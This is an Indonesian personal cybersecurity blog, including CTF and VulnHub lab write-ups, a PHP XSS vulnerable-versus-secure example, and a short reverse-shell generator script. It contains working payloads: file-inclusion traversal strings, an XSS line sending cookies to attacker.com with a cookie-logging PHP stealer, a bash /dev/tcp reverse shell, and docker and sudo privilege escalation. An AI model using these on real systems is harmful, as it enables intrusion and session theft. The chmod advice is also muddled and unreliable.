Pengikut

Minggu, 18 Mei 2025

Rencana singgah (good bye blogger)

 


Yoo udah lama gak upload nih.

"Min, kapan upload???"

Kapan-kapan sih, sekedar info aja. gw udah singgah ke gitbook atau medium buat nge blog wak. karena denger juga kalau blogger ini udah jarang dikunjungi gitu. yaudah lah tanpa basa basi. gw mau siapin git book nya dulu.

Gitbook

Jumat, 28 Maret 2025

File Inclusion (Vulnlab-Master)

                    

Yo watsap, gw belum pensi cuy. Kali ini kita bahas soal vulnlab dari repositori github nya devsibertren.

Seperti di judul, saya akan membahas file inclusion yang merupakan kerentanan dalam akses file oleh server. contohnya ketika ada parameter ?page=text.html kita bisa inject menjadi:

?page=../../vulnlabs.sql

?page=php://filter/convert.base64-encode/resource=../../config.php

lalu hasil encode base64 nya kita decode kemudian kita bisa dapat config database source code nya cuy dan hal ini vuln karena proses input user ke include file (isi file di print) tidak disanitasi menyebabkan data sensitif bisa ke ekspos seperti database dan lainnya.

1. Vulnerable


di website tentang restoran ini (ingat puasa woi), ada url dengan endpoint 'lang=en.php' untuk menunjukkan file ke en.php untuk diperlihatkan isi yang merupakan bahasa inggris. kita bisa menganalisa bahwa index.php memiliki proses include.

Nah jadi base64 encode tuh, coba kita decode dengan 'echo "encodetext" | base64 -d'


2. Blacklisted special character (1)

Di part 2 ini, ada sistem filter suatu karakter spesial seperti '/' yang menunjukkan sebuah direktori alhasil kita tak bisa menggunakan "..\..\vulnlabs.sql" secara POLOS. karena kita bisa pakai payload yang sudah di encode seperti "..%5C..%5Cvulnlabs.sql". Kenapa saya pakai '\' bukan '/' untuk menunjuk direktori? karena saya run ini vulnlab di windows yang dimana kalau pakai cmd bisa menggunakan '/' dan '\' tapi di linux hanya bisa pakai / saja. itulah kenapa saya pakai payload '\' saja. 

3. Blacklisted special character (2)

Sebenarnya sama aja sih kalau pakai "..%5C..%5Cvulnlabs.sql", tinggal kalian kembangin aja deh.

Sekian

Selasa, 04 Maret 2025

Selamat Menunaikan Ibadah Puasa Ramadhan

 


Assalamu'alaikum, di Post ini gw cuma mau bilang. Selamat menunaikan Ibadah Ramadhan. Mohon maaf jika pembahasan saya dulu ada yang bikin lu bingung atau gw ada kesalahan. Btw gw jarang upload bulan ini gara-gara lagi fokus in real life.

Sehat-sehat bang, wassalamu'alaikum

Rabu, 26 Februari 2025

PicoCTF(3) - keygenme.py (mendapat full version) - Reverse Engineering


 

1. Pengenalan


Link mode CTF (login dulu): DISINI

Langsung download file (py) nya: DISINI

Ok, kalau sebelumnya kita di CTF-RST itu steganography dan forensik. Kini saya akan membahas tema reverse engineering (rekayasa kode balik), yang artinya kita merekayasa suatu script agar melakukan apa yang kita mau. Hal ini wajib banget karena kalau mau jadi cyber security, ya kalian harus bisa coding kalau mau gak mau.

 Jadi kini kita lebih berhadapan pada kode, di sini saya memecahkan level CTF ini dengan menganalisa script yang diberikan. Agar kalian bisa cepat memahami pembahasan ini kalian harus sudah paham akan dasar-dasar python dan beberapa library (untuk library, sebenarnya bisa kalian terawang sendiri).


2. Pemetaan algoritma dalam script


Aduh jujur kalau membahas seluruh kode dalam script nya panjang banget. Tapi saya sarankan kalian baca dan pahami algoritma dalam script ini, siapa tahu berguna kan. Kalau kalian males, coba denger lagu BLUE YUNGKAI sambil baca ini script biar berasa lagi baca kisah cinta, wkwkwk.



Jadi bayangin aja kita punya aplikasi python yang mengarahkan pada alat tentang tata letak bintang galaksi, kita disini bertujuan untuk mendapat full version nya karena script ini bersifat trial version jadi gak lengkap karena bintang galaksi yang kita cari bernama "SAG-A" atau "Sagitarius-A" itu gak ada. dan katanya kita harus di galaksi itu untuk mendapat lisensi agar mendapat full version nya. Anggap aja dia sedang berbohong (pembohong publik 😹). 

saya bahas opsi "abc" nya aja deh. kalau "a" itu buat kita mengetahui tata letak bintang dan radiusnya yang berada di daftar dictionary dalam script ini. Opsi "b" itu terkunci karena kita harus full version dulu. opsi "c" untuk memasukkan kunci lisensi untuk mendapat script full version nya.



Sekilas mungkin hanya biasa saja, tapi jika lu udah baca semua source codenya dari awal sampai akhir. Pasti lu paham bahwa ternyata kata "x" delapan kali di key license yang merupakan kode unik yang harus dicari dan username "PRITCHARD" dijadiin literal biner. Karena ini akan digunakan untuk di gunakan dengan source code yang terletak di akhir source code dengan nama variable "full_version".



 Di gambar ini sebenarnya yang perlu diperhatiin yang variabel full_version nya aja. Karena yang dibawahnya itu saya yang lagi decrypt variable full_version nya tapi gagal. Itulah kenapa, saya memutuskan untuk mencari kunci lisensinya.


EA, kepanjangan ya! wkwkwk. singkatnya ini program untuk mengecek input kita agar valid. Nah, si program ini menggunakan username kita yang sudah di jadikan literal binary dan di ubah ke suatu proses cryptografi dengan format sha256. Ada urutannya juga tuh, "45362718". Otomatis kita bisa pakai dong buat nyari kode uniknya.


Nah udah saya modif tuh, biar bisa print setiap urutan dan flagnya. tinggal kita run deh.


Sip kita sudah dapat full version nya, tapi ternyata bintang "SAG-A" yang kita cari gak ada di full version guys :(. Jadi mana flag nya? flagnya adalah kunci lisensi yang kita gunakan untuk mendapat full versionnya.

flag: picoCTF{1n_7h3_|<3y_of_54ef6292}

catatan: flag ini tidak terjamin benar di picoCTF nya, bisa jadi telah dirubah agar tidak sama oleh developernya. 

Sekian

Sabtu, 15 Februari 2025

Vuln Code VS Secure Code -- PHP (1) Sanitazing input


1. Pendahuluan


"Menemukan kerentanan itu susah, tapi semua itu berubah setelah saya mengenal sedikit akan PHP"

Ya, dari gambar di atas mungkin kalian yang pernah coding PHP pasti paham lah. Gimana rasanya belajar bahasa pemrograman yang merupakan campuran dari bahasa pemograman C yang merupakan bahasa text to binary dan Bash scripting yang biasa digunakan pada sistem linux/unix berkedok web server. Sampai saya pikir, apa saya pakai bahasa python aja kali ya buat web dengan framework Flask atau Django, wkwk.

Saya sudah membuat repositori github berisi kode yang diperlukan dalam  pembahasan ini: DISINI


2. Apa itu PHP?


Jadi PHP itu apa sih? Singkatan dari Hypertext Preprocessor, merupakan bahasa yang bisa dibilang berada di tengah-tengah server, client, dan sistem. Jadi bisa integrasi lebih luas lah. Bahasa ini dibuat untuk membantu kekurangan HTML yang lebih mengarah ke tampilan dan hanya bisa membantu dari tag input dan JS yang di mana, scriptnya masih bisa dibaca sehingga bisa berbahaya kalau dijadikan back end penuh.

Dari namanya bisa kita simpulkan kalau PHP itu kayak prosesor, yang mengatur proses integrasi dalam suatu website dan itulah kenapa cangkupan PHP lebih luas seperti bisa ke server seperti SQL untuk mengakses database, ke client seperti menampilkan suatu text, dan ke sistem yang bisa mengeksekusi suatu command sistem dan memunculkan hasilnya ke user.

Dari informasi yang gw dapet, PHP ini ada 2 metode untuk interaksi user dan server. POST dan GET, kalau POST itu kayak mengirim paket atau permintaan dan tidak memengaruhi URL kita. Kalau GET itu mendapat permintaan dari user sehingga memengaruhi URL dan biasanya berupa "index.php?input=blablabla".

3. Vuln Code


Kita bahas dulu nih bagian Vuln codenya

$TEXT = $_GET['text'];

jadi ada dalam versi vulnerable dan securenya sama-sama menggunakan parameter "text" dengan metode GET.  Tapi keduanya memiliki cara berbeda dalam menangani masukan dari user.

Kalau kalian lihat kode di atas, itu parameter text nya tidak disanitasi dengan benar. Script menerima masukan apapun jenisnya dari user yang bisa mengakibatkan XSS vulnerability.

Tampilan web dari Vuln Code dan Secure code (secara tampilan):



Coba kita injeksi input dengan: "<script>window.location='http://linkmalware.com';</script>"
Ini mungkin tidak se berbahaya XSS stored yang tersimpan dan bisa mengakibatkan deface. Tapi bisa digunakan penyerang untuk kegiatan phising seperti

<script>document.location='http://attacker.com/steal?cookie=' + document.cookie</script>

yang bisa membuat user yang memasukkan kode ini atau ke url nya secara langsung mengirim sesi cookie ke penyerang, kalian gak mau kan website dinamis PHP kalian dibuat phising?.

Contoh script untuk phising (hanya contoh saja! jangan dipakai hal yang tidak etis!):


<?php
        $COOKIE = $_GET['steal'];
        if ($COOKIE == ''){
                echo "SHHH, use '?steal='";
        }
        else {
                system("echo '$COOKIE' >> steal.txt");
        }
?>

payload: <script>document.location = 'http://IP/steal.php?steal=' + document.cookie</script>
URL: http://IPWEB/vuln.php?text=<script>document.location = 'http://IP/steal.php?steal=' + document.cookie</script>

Hasil dari injeksi di file steal.txt: 



Nah itulah salah satu bahayanya, jadi kerentanan kita dipakai untuk penipuan dan pencurian sesi cookie yang bisa berdampak buruk bagi pengguna web kita.

4. Secure Code

Nah jadi gimana cara mengamankannya? kita pakai:


$TEXT = htmlspecialchars($_GET['text'], ENT_QUOTES, 'UTF-8');
penjelasan: 
1. htmlspecialchars --> untuk merubah input tidak menjadi kode apapun selain html
2. ENT_QUOTES --> untuk merubah unsur quotes '/" menjadi kata lain
3. UTF-8 --> menunjukan karakter encoding untuk mendukung bahasa dan simbol

Hasil dari Secure code:



Nah jadinya gak vuln XSS tuh, karena javascriptnya tidak tereksekusi.
Sekian.

Rabu, 12 Februari 2025

Ingin menjadi hacker (cyber security) antusias?, jangan ngimpi kalau masih berpikir seperti ini (YappingTeori)

 


Kamu ingin menjadi hacker seperti yang ada di film atau editan yang lewat di konten shorts?, dan kalian pengen jadi seperti itu?. Mungkin lebih ke arah karir atau ikutan saja mungkin kalian pernah atau sedang mengalami ini, jika kalian hanya sekedar ikut-ikut saja kalian bisa skip postingan ini tapi kalau kalian ingin lebih mendalam akan karir untuk menjadi hacker atau cyber security kalian tidak boleh berpikir seperti ini dalam proses karir kalian atau singkatnya, menjadikan pemikiran ini untuk dipakai karir seterusnya:

1. Punya Kali Linux == Hacker --> False


Ya sebenarnya kita gak perlu Kali linux untuk hacking atau kegiatan cyber security lainnya, cukup terminal dan tool yang dibutuhkan saja sudah cukup. Jadi selama ini kita yang diajari Kali linux saat pertama kali kursus/belajar cyber security gimana? Kali linux itu hanyalah satu paket dari seluruh tool untuk hacking agar memudahkan proses pelatihan kita dengan begitu kita gak perlu setup tool yang kita butuhkan.

2. Hacker == Powerful --> False


Gak semua hacker mau itu jahat atau baik adalah yang terkuat di segala bidang pengetahuan, tanamkan ideologi bahwa tujuan kita adalah untuk membantu keamanan dan bukan untuk meraih kekuasaan atau kendali atas suatu hal yang bukan milik kita.

3. Github == OnlyForHacker --> False


Ya, Github itu bukan untuk hacker saja. Banyak developer dari berbagai sisi seperti web, AI, desain, dan lainnya yang share hasil coding mereka disini. Jadi bukan hanya untuk tool para hacker saja.

Singkatnya kalau kamu pengen jadi cyber security atau hacker baik, jangan pernah berniatan buruk sedikitpun, jangan tergantung pada tool otomatis saja dan yang terpenting ingat bahwa:

"Vulnerability is never gone until the end of the world"

Sekian.

Rabu, 29 Januari 2025

Vulnlab (1) -- Vulnhub@BlueMoon (WriteUp)


Disclaimer: Praktik ini dilakukan pada target yang sudah diizinkan untuk diretas seperti vulnlab atau laboratorium/virtual machine yang berasal dari Vulnhub. Bertujuan untuk edukasi semata.
---------------------------------------------------
Kalau mau ke Vulnhub page-nya: KESINI
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Kalau mau langsung download: KESINI
---------------------------------------------------

1. Scanning & Enumeration


Kita pakai nmap dengan -sC (script scanning) dan -p- (semua port) untuk permulaan
nmap -sC -p- 192.168.1.11 -T5

Output:


Ok, ternyata port 21 (ftp), 22 (ssh) dan 80 (http/web) terbuka cuy. Coba kita lihat webnya dengan buka chrome lalu search "http://(IP nya)"

Page:

Saya sudah cek source code nya dan tidak menunjukkan apa-apa, yaudah deh saya pakai dirsearch buat direktori enumeration. Saya pakai wordlists dari Seclists medium web, kalau mau lihat bisa KESINI.


dirsearch -u http://192.168.1.11 -w ~/medium_web_list.txt

Execute:

Nah ada direktori hidden_text tuh, coba kita buka.

Page:


Bentar kok kata "Thank You" nya seperti link gitu. Pas dipencet ternyata adalah link yang mengarah ke file gambar yang mirip dengan QR Code.

2. Analisis gambar/Steganografi


File/Image:


Saya pakai QR code scanner online aja biar cepet.

Output:


3. Akses Shell (1).


Ok, logikanya kalau kita bisa login FTP ke sistem yang berbasis Linux. Ada kemungkinan Kredensial login kita bisa digunakan pada SSH + kita pakai python -c untuk menggunakan pty buat mengubah shell kita agar nanti kalau mau apa bisa enak, pakai /bin/bash aja biar lebih stabil.

ssh userftp@(IP nya)
password: ftpp@ssword
python -c 'import pty; pty.spawn("/bin/bash")'

btw, pas saya lihat lebih dalam lagi. Ada direktori "files" yang berisi dua file yaitu information.txt dan p_lists.txt. Coba kita lihat information.txt nya.

Output:


Ada pesan bahwa user dengan nama "robin" disuruh untuk memilih antara password disuatu list yang dimana, adalah file bernama "p_lists.txt". Kita copy paste isi filenya lalu taruh di file kita lalu langsung brute force user "robin" pakai hydra.

hydra -l robin -P p_lists.txt ssh://(IP nya) -t 4

Output:


Kita keluar dari userftp dan langsung ssh ke user robin-nya pakai "ssh robin@(IP-nya)".

4. Akses Shell (2).



Ok, ada 2 file lagi nih. "user1.txt" yang merupakan flag pertama kita. Dan feedback.sh. Bentar coba kita otak-atik dengan "sudo -l" untuk sedikit melihat config sudo antar user-nya.


Hmm? kita bisa menggunakan user "jerry" untuk mengeksekusi "feedback.sh" dan file tersebut ternyata 
vuln dari kata "$feedback 2>/dev/null" coy. Yang artinya bisa kita gunakan untuk mengeksekusi suatu command dengan atas nama user "jerry"

sudo -u jerry ./feedback.sh 
Name: apaaja
feedback: /bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'

Execute:


Sip kita sudah dapat flag yang ke 2.

5. Root access/akses root

Coba kita pakai command "id" untuk sedikit melihat informasi akan user yang kita gunakan saat ini.


Hmm? docker? coba kita pakai payload privilege escalation with docker untuk mendapat root.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# penjelasan:
docker run --> buat jalanin kontainer baru.
-v /:/mnt --> buat memasang direktori host dari '/'yang merupakan root ke '/mnt' pada kontainer.
--rm --> otomatis menghapus kontainer setelah selesai.
-it --> perpaduan antara terminal, shell interaktif.
alpine --> nama gambar docker untuk container.
chroot /mnt sh --> mengubah direktori root ke /mnt dan memulai shell.
Execute:


6. Penutup praktik

Nah udah deh, disini kita bisa melakukan apa aja. Deface atau segala macem.

Sebelum: 


Sesudah:


7. Kesimpulan

walau ini vulnlab yang dimana semua kerentanan ada yang disengaja, kita bisa mengambil kesimpulan bahwa untuk meningkatkan keamanan agar tidak terjadi seperti ini bisa dengan cara:

1. Usahakan jangan buat file password list biar gak di crack, kirim langsung aja ke orangnya.
2.  Pastikan pengaturan user-nya aman 
3. Jangan pakai ftp karena lebih mudah dibaca (plain text).

Sekian

Sabtu, 25 Januari 2025

Cara membuat file dalam website mu lebih aman (apache2)

 


Disclaimer: Post ini hanya bertujuan untuk edukasi dengan tema meningkatkan prinsip keamanan CIA Triad ke 1 (Kerahasiaan).

Jujur ini adalah hal yang basic tapi penting banget kalau kalian semisalnya menaruh file penting dalam website kalian yang dibutuhkan seperti config, .htaccess, dan lainnya yang sensitif. Ini sebenarnya bukan kerentanan sih. Hanya saja bisa jadi jembatan penyerang untuk mencari kerentanan lainnya. Hal ini sering ditemukan pada website CBT, website kecil-kecilan, dan website yang kurang diperhatikan

Semisalnya ada suatu website yang menyimpan file rahasia yang ada di /var/www/html atau tempat dimana file index website tersebut ditaruh.

contoh website:


Nah penyerang bisa aja nyari hal yang disembunyikan lewat gambarnya.
Contoh:


ternyata gambar tersebut tersimpan pada suatu direktori "img/" dengan nama file "boci.jpg", coba kita bedah lebih lanjut ke direktori tersebut dengan mengganti "/img/boci.jpg" menjadi "/img" saja.


Nah ada file "secret.html" tuh, coba kita buka.


Ok jadi gimana cara membuat file kita lebih aman? Dalam Linux ada yang namanya "chmod" untuk mengatur izin baca, tulis/edit, dan execute/run. Ketika kita mengakses suatu web apache, kita hampir mirip dengan user www-data dalam mengakses file. User ini dibuat agar ketika penyerang berhasil mendapat akses shell ke web tersebut, dia hanya menjadi user www-data yang memiliki akses terbatas yang lebih dominan ke arah baca saja. Otomatis kita penyerang bisa baca nih file yang sensitif dan gimana cara membuat penyerang atau orang yang tidak memiliki hak tidak bisa membaca file tersebut?


# untuk menghapus izin baca pada user lain (others) pada semua isi direktori + direktorinya (pengunjung web termasuk)
chmod u-rw -R (direktori yang ingin disembunyikan). atau 
chmod u-rw (file) untum file tertentu
# Jangan pakai command yang pertama kalau kalian pakai ke file/direktori yang perlu diakses

Kalau kita jalankan command di atas maka pengunjung/penyerang web tidak bisa melihat file tersebut.

Sebelum pakai command chmod:


Page:


Sesudah:


Page:



Gimana? mudah kan? + direktori "/img" juga tidak bisa diakses oleh pengunjung/penyerang web. Kebanyakan web yang menggunakan cara ini juga lupa untuk menghapus akses baca pada suatu file dalam direktori, jadi walau direktorinya gak bisa kita baca. Kita masih bisa lihat file didalamnya.
Sekian.

Sabtu, 18 Januari 2025

Simple Netcat reverse shell payload generator (Bash scripting)

 


Disclaimer: Post ini hanya bertujuan membantu dalam hal baik dan edukasi, penulis tidak bertanggung jawab akan peretasan yang dilakukan dengan mengambil dalam post ini. Tool ini memiliki unsur-unsur reverse shell yang bisa mengendalikan sistem tanpa izin juga melanggar kode etis CIA Triad ke 1 dan 2 (Kerahasiaan dan integritas). Penulis menyarankan pembaca untuk menggunakan tool ini pada target yang sudah memberi izin akan penetration testing seperti Vulnlab atau CTF.

Halo semuanya, gimana kabar kalian?. Maaf nih pembahasan kali ini agak kurang kompenten dengan yang minggu lalu, singkatnya saya mau kasih script untuk reverse shell generator. Jadi pertama kalian diminta untuk masukin nomor port untuk netcat shell kalian.

Nanti bakal otomatis start netcat-nya dengan IP kalian dan port yang kalian masukin, tinggal kalian tembak-kin payload yang diberikan tool ini kepada target kalian setelah itu lihat hasilnya.

Github version: DISINI


#!/bin/bash
MYIP=$(hostname -I | awk '{print $1}')
echo "Port: "; read PORT
echo "Your Payload: bash -i >& /dev/tcp/$MYIP/$PORT 0>&1"
nc -lvnp $PORT

Copy paste ke file script kalian dengan ekstensi (.sh) setelah itu tinggal di run. Kalau keluarnya 0.0.0.0 kalian gak usah bingung, ini karena script saya pakai parameter -n untuk menoknatifkan resolusi DNS untuk membuat netcat mendengarkan seluruh jaringan antarmuka bisa multi target juga tuh. Dan agar memudahkan netcat untuk diarahkan pada custom target yang merupakan target yang sudah kalian tembak payload ke dia. Singkatnya untuk menerima koneksi ke berbagai alamat IP.

Sekian

Minggu, 12 Januari 2025

CTF-RST(2): Cute Cerberus.

 


Halo semuanya, gimana kabarnya?. Di CTF kali ini kita masih berhubungan dengan gambar tapi dengan cara analisis yang berbeda. Jika tadi membahas soal steganography kini kita membahas akan forensik. Ok langsung aja kita ke pembahasannya.

Kita dikasih gambar yang merupakan target/file yang akan kita cek, gambar ini berupa gambar anime biasa berjumlah 3 gadis perempuan (imut banget woilah). Dengan nama file: "cute_cerberus.jpg".



Sekilas hanya foto biasa dan format isinya juga begitu saja, jadi kita ingin melihat bagian metadatanya!. Metadata adalah informasi yang diberikan oleh pengguna atau pembuat gambar untuk dijadikan informasi umum pada suatu file, tidak hanya file saja. Gmail, akun, dan web juga punya metadata. Jika kalian bingung kalian bisa lihat ilustrasi gambar ini.


Untuk melihat suatu metadata kalian bisa pakai tool bernama "exiftool". sebenarnya kalian bisa pakai metadata checker online di web tapi kalau mau langsung di terminal. Kalian pakai command:

~ sudo apt install exiftool

~ exiftool <file>


output:


Nah!, di bagian "copyright". Ada format base64 yang kalau kita decode/ubah ke teks dengan command:

~ echo "Q1RGUlNUe3MwTl8wZl9oNEQzNX0=" | base64 -d

Maka akan keluar berupa flag yang kita cari:   CTFRST{s0N_0f_h4D35}
Sekian.

Jumat, 10 Januari 2025

CTF-RST(1): Jangan mudah tertipu.



Halo teman-teman bagaimana kabar kalian?, kali ini saya akan sedikit membahas salah satu level CTF dari web bernama Rajawali Cyber Team. Jika kalian berminat kalian bisa ke sini CTFRST. Ok tanpa basa-basi persiapkan buku catatan kalian jika ada hal penting yang bisa kalian catat dari postingan ini yang mungkin bisa membantu kalian nanti.

Singkatnya di level CTF ini kita disuruh untuk mendapat pesan rahasia dari suatu file image (katanya kita disuruh untuk mencari pesan tersebut). akan tetapi ketika dibuka image-nya berisikan seperti ini.


Lah, pesan rahasianya mana? sekilas mungkin hanya sebuah gambar. Karena itu kita ingin melihat suatu yang lebih dalam!, kita ingin tahu apa format isi yang membentuk file ini, apakah ada pesan yang dimaksud? masih ingat soal command "cat" dan "strings"?. Jadi cat berfungsi untuk menampilkan isi file secara polos, jadi binary + text yang ada di suatu gambar ditampilkan semua. Tapi kalau pakai strings kita bisa melihat unsur "human readable" atau huruf yang bisa dibaca manusia pada suatu file.

strings RSTstegsteg.jpg

output:


Wah apaan nih? pas saya scroll ke atas sampai mentok kok kayak ada yang gak asing ya?, ini membuat saya teringat akan satu tool yang bernama "steghide". Jadi tool ini berfungsi untuk menyembunyikan file pada suatu image, dan biasanya tanda-tanda gambar yang disisipi file oleh steghide memiliki format header atau bagian atas format strings seperti pada gambar diatas. Kalau kalian mau belajar lebih lanjut akan tool ini kalian bisa lihat di youtube atau lainnya.

~ steghide extract -sf RSTstegsteg.jpg
(Kalau diminta password/passphrase, kosongin aja langsung enter)

output:


Nah!, kita dapat file bernama "steganopayload485402.txt". File ini kalau di lihat berisi flag yang merupakan pesan rahasia dari image tersebut, tinggal kita submit deh.

flag: CTFRST{JANGANMUDAHTERTIPU}